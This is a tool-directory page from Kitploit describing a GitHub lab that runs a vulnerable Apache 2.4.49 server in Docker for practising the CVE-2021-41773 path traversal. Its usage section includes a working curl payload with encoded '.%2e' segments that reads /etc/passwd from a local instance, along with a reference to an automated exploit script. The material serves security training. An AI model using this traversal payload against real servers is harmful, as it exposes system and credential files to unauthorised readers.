Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
apache-cve-2021-41773-lab — Vulnerable Docker lab and exploit for Apache HTTP Server 2.4.49 path traversal vulnerability (CVE‑2021‑41773) | Kitploit
Tools/GitHubGitHub/zubairahm3d/apache-cve-2021-41773-lab
Vulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubzubairahm3d/apache-cve-2021-41773-lab

apache-cve-2021-41773-lab

Vulnerable Docker lab and exploit for Apache HTTP Server 2.4.49 path traversal vulnerability (CVE‑2021‑41773)

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
5 months agoNot yet reviewed

Apache 2.4.49 Path Traversal Lab — CVE-2021-41773

Clone

root@kitploit:~
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh

Usage

Start the vulnerable server:

root@kitploit:~
./apache_lab.sh  # choose option 1

Manual exploit:

root@kitploit:~
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Automated exploit:

root@kitploit:~
python3 exploit.py

Stop the server:

root@kitploit:~
./apache_lab.sh  # choose option 2

Lab Setup

Lab setup

Version confirmation

Version confirmation

Manual path traversal

Manual path traversal

Exploit

Exploit output

Download Tool